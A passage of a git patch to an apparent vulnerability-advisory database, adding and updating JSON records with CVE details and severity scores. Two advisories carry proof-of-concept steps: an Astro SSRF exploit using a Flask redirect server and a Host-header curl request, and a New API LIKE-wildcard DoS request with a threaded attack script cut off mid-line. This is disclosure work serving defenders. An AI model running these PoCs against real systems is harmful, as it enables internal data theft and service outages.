"2026-02-23T21:19:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pc7w-r272-4xgr/GHSA-pc7w-r272-4xgr.json b/advisories/unreviewed/2026/02/GHSA-pc7w-r272-4xgr/GHSA-pc7w-r272-4xgr.json new file mode 100644 index 0000000000000..6f277458cb78d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pc7w-r272-4xgr/GHSA-pc7w-r272-4xgr.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pc7w-r272-4xgr", + "modified": "2026-02-23T21:31:27Z", + "published": "2026-02-23T21:31:27Z", + "aliases": [ + "CVE-2026-23693" + ], + "details": "ElementsKit Lite (elementskit-lite) WordPress plugin versions prior to 3.7.9 expose the REST endpoint /wp-json/elementskit/v1/widget/mailchimp/subscribe without authentication. The endpoint accepts client-supplied Mailchimp API credentials and insufficiently validates certain parameters, including the list parameter, when constructing upstream Mailchimp API requests. An unauthenticated attacker can abuse the endpoint as an open proxy to Mailchimp, potentially triggering unauthorized API calls, manipulating subscription data, exhausting API quotas, or causing resource consumption on the affected WordPress site.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:H/SC:L/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23693" + }, + { + "type": "WEB", + "url": "https://wordpress.org/plugins/elementskit-lite" + }, + { + "type": "WEB", + "url": "https://wpmet.com/plugin/elementskit" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/elementskit-lite-unauthenticated-mailchimp-rest-endpoint" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-306" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T21:19:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pfgm-6983-f589/GHSA-pfgm-6983-f589.json b/advisories/unreviewed/2026/02/GHSA-pfgm-6983-f589/GHSA-pfgm-6983-f589.json index 5eedab98e0b85..8d350bb062554 100644 --- a/advisories/unreviewed/2026/02/GHSA-pfgm-6983-f589/GHSA-pfgm-6983-f589.json +++ b/advisories/unreviewed/2026/02/GHSA-pfgm-6983-f589/GHSA-pfgm-6983-f589.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-pfgm-6983-f589", - "modified": "2026-02-20T18:31:38Z", + "modified": "2026-02-23T21:31:23Z", "published": "2026-02-20T18:31:38Z", "aliases": [ "CVE-2025-70831" ], "details": "A Remote Code Execution (RCE) vulnerability was found in Smanga 3.2.7 in the /php/path/rescan.php interface. The application fails to properly sanitize user-supplied input in the mediaId parameter before using it in a system shell command. This allows an unauthenticated attacker to inject arbitrary operating system commands, leading to complete server compromise.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-78" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:29Z" diff --git a/advisories/unreviewed/2026/02/GHSA-pfjc-cfqc-87f5/GHSA-pfjc-cfqc-87f5.json b/advisories/unreviewed/2026/02/GHSA-pfjc-cfqc-87f5/GHSA-pfjc-cfqc-87f5.json new file mode 100644 index 0000000000000..3e8d2e8faf862 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pfjc-cfqc-87f5/GHSA-pfjc-cfqc-87f5.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pfjc-cfqc-87f5", + "modified": "2026-02-23T21:31:28Z", + "published": "2026-02-23T21:31:27Z", + "aliases": [ + "CVE-2026-3025" + ], + "details": "A flaw has been found in ShuoRen Smart Heating Integrated Management Platform 1.0.0. Affected by this vulnerability is an unknown functionality of the file /MP/Service/Webservice/ExampleNodeService.asmx. Executing a manipulation of the argument File can lead to unrestricted upload. It is possible to launch the attack remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3025" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347381" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347381" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.756376" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T21:19:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pp46-7w92-4xvf/GHSA-pp46-7w92-4xvf.json b/advisories/unreviewed/2026/02/GHSA-pp46-7w92-4xvf/GHSA-pp46-7w92-4xvf.json index d54576b1272d0..731ba31ff35ea 100644 --- a/advisories/unreviewed/2026/02/GHSA-pp46-7w92-4xvf/GHSA-pp46-7w92-4xvf.json +++ b/advisories/unreviewed/2026/02/GHSA-pp46-7w92-4xvf/GHSA-pp46-7w92-4xvf.json @@ -46,7 +46,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-89" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-q8wg-gw6g-8c93/GHSA-q8wg-gw6g-8c93.json b/advisories/unreviewed/2026/02/GHSA-q8wg-gw6g-8c93/GHSA-q8wg-gw6g-8c93.json index 692cea57e14ed..6ae3450414114 100644 --- a/advisories/unreviewed/2026/02/GHSA-q8wg-gw6g-8c93/GHSA-q8wg-gw6g-8c93.json +++ b/advisories/unreviewed/2026/02/GHSA-q8wg-gw6g-8c93/GHSA-q8wg-gw6g-8c93.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-q8wg-gw6g-8c93", - "modified": "2026-02-20T18:31:39Z", + "modified": "2026-02-23T21:31:23Z", "published": "2026-02-20T18:31:39Z", "aliases": [ "CVE-2025-70833" ], "details": "An Authentication Bypass vulnerability in Smanga 3.2.7 allows an unauthenticated attacker to reset the password of any user (including the administrator) and fully takeover the account by manipulating POST parameters. The issue stems from insecure permission validation in check-power.php.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-287" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T17:25:50Z" diff --git a/advisories/unreviewed/2026/02/GHSA-qg32-r7gw-fcxw/GHSA-qg32-r7gw-fcxw.json b/advisories/unreviewed/2026/02/GHSA-qg32-r7gw-fcxw/GHSA-qg32-r7gw-fcxw.json new file mode 100644 index 0000000000000..c650c5a6794ed --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qg32-r7gw-fcxw/GHSA-qg32-r7gw-fcxw.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qg32-r7gw-fcxw", + "modified": "2026-02-23T21:31:28Z", + "published": "2026-02-23T21:31:28Z", + "aliases": [ + "CVE-2026-3027" + ], + "details": "A vulnerability was found in erzhongxmu JEEWMS up to 3.7. This affects an unknown part of the file src/main/webapp/plug-in/ueditor/jsp/getContent.jsp of the component UEditor. The manipulation of the argument myEditor results in cross site scripting. The attack can be launched remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3027" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347383" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347383" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.756523" + }, + { + "type": "WEB", + "url": "https://www.notion.so/JEEWMS-Reflected-XSS-Vulnerability-in-UEditor-Module-304ea92a3c41806a97ffc9b707f2fbf0" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T21:19:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qqj5-wp73-78fr/GHSA-qqj5-wp73-78fr.json b/advisories/unreviewed/2026/02/GHSA-qqj5-wp73-78fr/GHSA-qqj5-wp73-78fr.json index 2a3fa7b421b2c..baa3077e9978b 100644 --- a/advisories/unreviewed/2026/02/GHSA-qqj5-wp73-78fr/GHSA-qqj5-wp73-78fr.json +++ b/advisories/unreviewed/2026/02/GHSA-qqj5-wp73-78fr/GHSA-qqj5-wp73-78fr.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-qqj5-wp73-78fr", - "modified": "2026-02-20T18:31:37Z", + "modified": "2026-02-23T21:31:23Z", "published": "2026-02-20T18:31:37Z", "aliases": [ "CVE-2025-69393" ], "details": "Missing Authorization vulnerability in Jthemes Exzo exzo allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Exzo: from n/a through <= 1.2.4.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-862" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:24Z" diff --git a/advisories/unreviewed/2026/02/GHSA-r222-jjm5-r49x/GHSA-r222-jjm5-r49x.json b/advisories/unreviewed/2026/02/GHSA-r222-jjm5-r49x/GHSA-r222-jjm5-r49x.json new file mode 100644 index 0000000000000..55cdaad79f1b5 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-r222-jjm5-r49x/GHSA-r222-jjm5-r49x.json @@ -0,0 +1,31 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-r222-jjm5-r49x", + "modified": "2026-02-23T21:31:28Z", + "published": "2026-02-23T21:31:28Z", + "aliases": [ + "CVE-2026-3075" + ], + "details": "Exposure of Sensitive System Information to an Unauthorized Control Sphere vulnerability in Jeff Starr Simple Ajax Chat simple-ajax-chat allows Retrieve Embedded Sensitive Data.This issue affects Simple Ajax Chat: from n/a through <= 20251121.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3075" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/Wordpress/Plugin/simple-ajax-chat/vulnerability/wordpress-simple-ajax-chat-plugin-20251121-sensitive-data-exposure-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-497" + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-23T21:19:13Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-r4m5-gc42-8vvh/GHSA-r4m5-gc42-8vvh.json b/advisories/unreviewed/2026/02/GHSA-r4m5-gc42-8vvh/GHSA-r4m5-gc42-8vvh.json index c293e49d3b5a5..91cd454a1ccae 100644 --- a/advisories/unreviewed/2026/02/GHSA-r4m5-gc42-8vvh/GHSA-r4m5-gc42-8vvh.json +++ b/advisories/unreviewed/2026/02/GHSA-r4m5-gc42-8vvh/GHSA-r4m5-gc42-8vvh.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-r4m5-gc42-8vvh", - "modified": "2026-02-20T00:31:53Z", + "modified": "2026-02-23T21:31:23Z", "published": "2026-02-20T00:31:53Z", "aliases": [ "CVE-2025-8055" ], "details": "Server-Side Request Forgery (SSRF) vulnerability in OpenText™ XM Fax allows Server Side Request Forgery. \n\nThe vulnerability could allow an attacker to\n\n\n\nperform blind SSRF to other systems accessible from the XM Fax server.\n\nThis issue affects XM Fax: 24.2.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:N/AU:Y/R:A/V:D/RE:M/U:Amber" diff --git a/advisories/unreviewed/2026/02/GHSA-rp93-gq4p-8r62/GHSA-rp93-gq4p-8r62.json b/advisories/unreviewed/2026/02/GHSA-rp93-gq4p-8r62/GHSA-rp93-gq4p-8r62.json index 402424f7c9e0e..cf7d7e34d2389 100644 --- a/advisories/unreviewed/2026/02/GHSA-rp93-gq4p-8r62/GHSA-rp93-gq4p-8r62.json +++ b/advisories/unreviewed/2026/02/GHSA-rp93-gq4p-8r62/GHSA-rp93-gq4p-8r62.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-rp93-gq4p-8r62", - "modified": "2026-02-20T18:31:39Z", + "modified": "2026-02-23T21:31:23Z", "published": "2026-02-20T18:31:39Z", "aliases": [ "CVE-2026-26724" ], "details": "Cross Site Scripting vulnerability in Key Systems Inc Global Facilities Management Software v. 20230721a allows a remote attacker to execute arbitrary code via the selectgroup and gn parameters on the /?Function=Groups endpoint.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -21,7 +26,7 @@ ], "database_specific": { "cwe_ids": [], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T17:25:55Z" diff --git a/advisories/unreviewed/2026/02/GHSA-vq94-wmm9-737m/GHSA-vq94-wmm9-737m.json b/advisories/unreviewed/2026/02/GHSA-vq94-wmm9-737m/GHSA-vq94-wmm9-737m.json index 44893b54091aa..9584260a11bb2 100644 --- a/advisories/unreviewed/2026/02/GHSA-vq94-wmm9-737m/GHSA-vq94-wmm9-737m.json +++ b/advisories/unreviewed/2026/02/GHSA-vq94-wmm9-737m/GHSA-vq94-wmm9-737m.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-vq94-wmm9-737m", - "modified": "2026-02-19T18:31:54Z", + "modified": "2026-02-23T21:31:22Z", "published": "2026-02-19T18:31:54Z", "aliases": [ "CVE-2025-15560" ], "details": "An authenticated attacker with minimal permissions can exploit a SQL injection in the WorkTime server \"widget\" API endpoint to inject SQL queries. If the Firebird backend is used, attackers are able to retrieve all data from the database backend. If the MSSQL backend is used the attacker can execute arbitrary SQL statements on the database backend and gain access to sensitive data.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-89" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-19T11:15:56Z" diff --git a/advisories/unreviewed/2026/02/GHSA-w2hw-vq92-cm3x/GHSA-w2hw-vq92-cm3x.json b/advisories/unreviewed/2026/02/GHSA-w2hw-vq92-cm3x/GHSA-w2hw-vq92-cm3x.json index e9d68aa6beda3..dd1fb079a72a8 100644 --- a/advisories/unreviewed/2026/02/GHSA-w2hw-vq92-cm3x/GHSA-w2hw-vq92-cm3x.json +++ b/advisories/unreviewed/2026/02/GHSA-w2hw-vq92-cm3x/GHSA-w2hw-vq92-cm3x.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-w2hw-vq92-cm3x", - "modified": "2026-02-20T18:31:36Z", + "modified": "2026-02-23T21:31:23Z", "published": "2026-02-20T18:31:36Z", "aliases": [ "CVE-2025-69380" ], "details": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in vanquish Upload Files Anywhere wp-upload-files-anywhere allows Path Traversal.This issue affects Upload Files Anywhere: from n/a through <= 2.8.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-22" ], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:22Z" diff --git a/advisories/unreviewed/2026/02/GHSA-wqcv-67x3-mx26/GHSA-wqcv-67x3-mx26.json b/advisories/unreviewed/2026/02/GHSA-wqcv-67x3-mx26/GHSA-wqcv-67x3-mx26.json index 6968fdd26c4e3..e0ccd5ccbe41a 100644 --- a/advisories/unreviewed/2026/02/GHSA-wqcv-67x3-mx26/GHSA-wqcv-67x3-mx26.json +++ b/advisories/unreviewed/2026/02/GHSA-wqcv-67x3-mx26/GHSA-wqcv-67x3-mx26.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-wqcv-67x3-mx26", - "modified": "2026-02-20T18:31:39Z", + "modified": "2026-02-23T21:31:23Z", "published": "2026-02-20T18:31:39Z", "aliases": [ "CVE-2026-24956" ], "details": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Shahjada Download Manager Addons for Elementor wpdm-elementor allows Blind SQL Injection.This issue affects Download Manager Addons for Elementor: from n/a through <= 1.3.0.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-89" ], - "severity": null, + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T16:22:39Z" diff --git a/advisories/unreviewed/2026/02/GHSA-xf4f-qj26-72pf/GHSA-xf4f-qj26-72pf.json b/advisories/unreviewed/2026/02/GHSA-xf4f-qj26-72pf/GHSA-xf4f-qj26-72pf.json index 3bc08b8a5eb03..71360b001f9bd 100644 --- a/advisories/unreviewed/2026/02/GHSA-xf4f-qj26-72pf/GHSA-xf4f-qj26-72pf.json +++ b/advisories/unreviewed/2026/02/GHSA-xf4f-qj26-72pf/GHSA-xf4f-qj26-72pf.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-xf4f-qj26-72pf", - "modified": "2026-02-20T18:31:39Z", + "modified": "2026-02-23T21:31:24Z", "published": "2026-02-20T18:31:39Z", "aliases": [ "CVE-2026-26747" ], "details": "A Host Header Poisoning vulnerability exists in Monica 4.1.2 due to improper handling of the HTTP Host header in app/Providers/AppServiceProvider.php, combined with the default misconfiguration where the \"app.force_url\" is not set and default is \"false\". The application generates absolute URLs (such as those used in password reset emails) using the user-supplied Host header. This allows remote attackers to poison the password reset link sent to a victim,", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-644" + ], + "severity": "CRITICAL", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-20T17:25:56Z" From 86cca5d275a1efd1af9e349fe776b8f61c9227d2 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Mon, 23 Feb 2026 21:55:47 +0000 Subject: [PATCH 56/77] Publish GHSA-qq67-mvv5-fw3g --- .../GHSA-qq67-mvv5-fw3g.json | 65 +++++++++++++++++++ 1 file changed, 65 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-qq67-mvv5-fw3g/GHSA-qq67-mvv5-fw3g.json diff --git a/advisories/github-reviewed/2026/02/GHSA-qq67-mvv5-fw3g/GHSA-qq67-mvv5-fw3g.json b/advisories/github-reviewed/2026/02/GHSA-qq67-mvv5-fw3g/GHSA-qq67-mvv5-fw3g.json new file mode 100644 index 0000000000000..9216f9bc871a0 --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-qq67-mvv5-fw3g/GHSA-qq67-mvv5-fw3g.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qq67-mvv5-fw3g", + "modified": "2026-02-23T21:54:32Z", + "published": "2026-02-23T21:54:32Z", + "aliases": [ + "CVE-2026-25545" + ], + "summary": "Astro has Full-Read SSRF in error rendering via Host: header injection", + "details": "### Summary\n\nServer-Side Rendered pages that return an error with a prerendered custom error page (eg. `404.astro` or `500.astro`) are vulnerable to SSRF. If the `Host:` header is changed to an attacker's server, it will be fetched on `/500.html` and they can redirect this to any internal URL to read the response body through the first request.\n\n### Details\n\nThe following line of code fetches `statusURL` and returns the response back to the client:\n\nhttps://github.com/withastro/astro/blob/bf0b4bfc7439ddc565f61a62037880e4e701eb05/packages/astro/src/core/app/base.ts#L534\n\n`statusURL` comes from `this.baseWithoutTrailingSlash`, which [is built from the `Host:` header](https://github.com/withastro/astro/blob/e5e3208ee5041ad9cccd479c29a34bf6183a6505/packages/astro/src/core/app/node.ts#L81). `prerenderedErrorPageFetch()` is just `fetch()`, and **follows redirects**. This makes it possible for an attacker to set the `Host:` header to their server (eg. `Host: attacker.tld`), and if the server still receives the request without normalization, Astro will now fetch `http://attacker.tld/500.html`.\n\nThe attacker can then redirect this request to http://localhost:8000/ssrf.txt, for example, to fetch any locally listening service. The response code is not checked, because as the comment in the code explains, this fetch may give a 200 OK. The body and headers are returned back to the attacker.\n\nLooking at the vulnerable code, the way to reach this is if the `renderError()` function is called (error response during SSR) and the error page is prerendered (custom `500.astro` error page). The PoC below shows how a basic project with these requirements can be set up.\n\n**Note**: Another common vulnerable pattern for `404.astro` we saw is:\n\n```astro\nreturn new Response(null, {status: 404});\n```\n\nAlso, it does not matter what `allowedDomains` is set to, since it only checks the `X-Forwarded-Host:` header.\n\nhttps://github.com/withastro/astro/blob/9e16d63cdd2537c406e50d005b389ac115755e8e/packages/astro/src/core/app/base.ts#L146\n\n### PoC\n\n1. Create a new empty project\n\n```bash\nnpm create astro@latest poc -- --template minimal --install --no-git --yes\n```\n\n2. Create `poc/src/pages/error.astro` which throws an error with SSR:\n\n```astro\n---\nexport const prerender = false;\n\nthrow new Error(\"Test\")\n---\n```\n\n3. Create `poc/src/pages/500.astro` with any content like:\n\n```astro\n

500 Internal Server Error

\n```\n\n4. Build and run the app\n\n```bash\ncd poc\nnpx astro add node --yes\nnpm run build && npm run preview\n```\n\n5. Set up an \"internal server\" which we will SSRF to. Create a file called `ssrf.txt` and host it locally on http://localhost:8000:\n\n```bash\ncd $(mktemp -d)\necho \"SECRET CONTENT\" > ssrf.txt\npython3 -m http.server\n```\n\n6. Set up attacker's server with exploit code and run it, so that its server becomes available on http://localhost:5000:\n\n```python\n# pip install Flask\nfrom flask import Flask, redirect\n\napp = Flask(__name__)\n\n@app.route(\"/500.html\")\ndef exploit():\n return redirect(\"http://127.0.0.1:8000/ssrf.txt\")\n\nif __name__ == \"__main__\":\n app.run()\n```\n\n7. Send the following request to the server, and notice the 500 error returns \"SECRET CONTENT\".\n\n```shell\n$ curl -i http://localhost:4321/error -H 'Host: localhost:5000'\nHTTP/1.1 500 OK\ncontent-type: text/plain\ndate: Tue, 03 Feb 2026 09:51:28 GMT\nlast-modified: Tue, 03 Feb 2026 09:51:09 GMT\nserver: SimpleHTTP/0.6 Python/3.12.3\nConnection: keep-alive\nKeep-Alive: timeout=5\nTransfer-Encoding: chunked\n\nSECRET CONTENT\n```\n\n### Impact\n\nAn attacker who can access the application without `Host:` header validation (eg. through finding the origin IP behind a proxy, or just by default) can fetch their own server to redirect to any internal IP. With this they can fetch cloud metadata IPs and interact with services in the internal network or localhost.\n\nFor this to be vulnerable, [a common feature](https://docs.astro.build/en/basics/astro-pages/#custom-500-error-page) needs to be used, with direct access to the server (no proxies).", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:L/SA:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "@astrojs/node" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "9.5.4" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/withastro/astro/security/advisories/GHSA-qq67-mvv5-fw3g" + }, + { + "type": "WEB", + "url": "https://github.com/withastro/astro/commit/e01e98b063e90d274c42130ec2a60cc0966622c9" + }, + { + "type": "PACKAGE", + "url": "https://github.com/withastro/astro" + }, + { + "type": "WEB", + "url": "https://github.com/withastro/astro/releases/tag/%40astrojs%2Fnode%409.5.4" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2026-02-23T21:54:32Z", + "nvd_published_at": null + } +} \ No newline at end of file From e323cf2f85b1d5f620a041d606e09cd31c630584 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Mon, 23 Feb 2026 21:58:10 +0000 Subject: [PATCH 57/77] Publish GHSA-w6x6-9fp7-fqm4 --- .../GHSA-w6x6-9fp7-fqm4.json | 65 +++++++++++++++++++ 1 file changed, 65 insertions(+) create mode 100644 advisories/github-reviewed/2026/02/GHSA-w6x6-9fp7-fqm4/GHSA-w6x6-9fp7-fqm4.json diff --git a/advisories/github-reviewed/2026/02/GHSA-w6x6-9fp7-fqm4/GHSA-w6x6-9fp7-fqm4.json b/advisories/github-reviewed/2026/02/GHSA-w6x6-9fp7-fqm4/GHSA-w6x6-9fp7-fqm4.json new file mode 100644 index 0000000000000..02703010ba9ea --- /dev/null +++ b/advisories/github-reviewed/2026/02/GHSA-w6x6-9fp7-fqm4/GHSA-w6x6-9fp7-fqm4.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-w6x6-9fp7-fqm4", + "modified": "2026-02-23T21:56:47Z", + "published": "2026-02-23T21:56:47Z", + "aliases": [ + "CVE-2026-25591" + ], + "summary": "New API has an SQL LIKE Wildcard Injection DoS via Token Search", + "details": "### Summary\nA SQL LIKE wildcard injection vulnerability in the `/api/token/search` endpoint allows authenticated users to cause Denial of Service through resource exhaustion by crafting malicious search patterns.\n\n### Details\nThe token search endpoint accepts user-supplied `keyword` and `token` parameters that are directly concatenated into SQL LIKE clauses without escaping wildcard characters (`%`, `_`). This allows attackers to inject patterns that trigger expensive database queries.\n\n### Vulnerable Code\nFile: `model/token.go:70`\n```go\nerr = DB.Where(\"user_id = ?\", userId).\n Where(\"name LIKE ?\", \"%\"+keyword+\"%\"). // No wildcard escaping\n Where(commonKeyCol+\" LIKE ?\", \"%\"+token+\"%\").\n Find(&tokens).Error\n```\n\n### PoC\n\nAfter creating over 2 million tokens, creating millions token entries is not difficult, because the rate limiting only applies to IP addresses, so multiple IP addresses can share one session, allowing for the creation of an unlimited number of tokens in batches.\n\n\"image\"\n\nThese data are not all loaded at once under normal circumstances, as shown in the image, and are displayed correctly. But if a request like this is submitted:\n\n```bash\n# A single request causes PostgreSQL to unconditionally retrieve all tokens belonging to that user. These requests buffer will all go into the buffer zone, causing an overflow and preventing the program from functioning properly.\ncurl 'http://localhost:3000/api/token/search?keyword=%&token='\n```\n\n\"image\"\n\nIt will cause DoS.\n\n```python\nimport requests\nfrom concurrent.futures import ThreadPoolExecutor\n\ndef attack(session_cookie):\n requests.get(\n 'http://localhost:3000/api/token/search',\n params={'keyword': 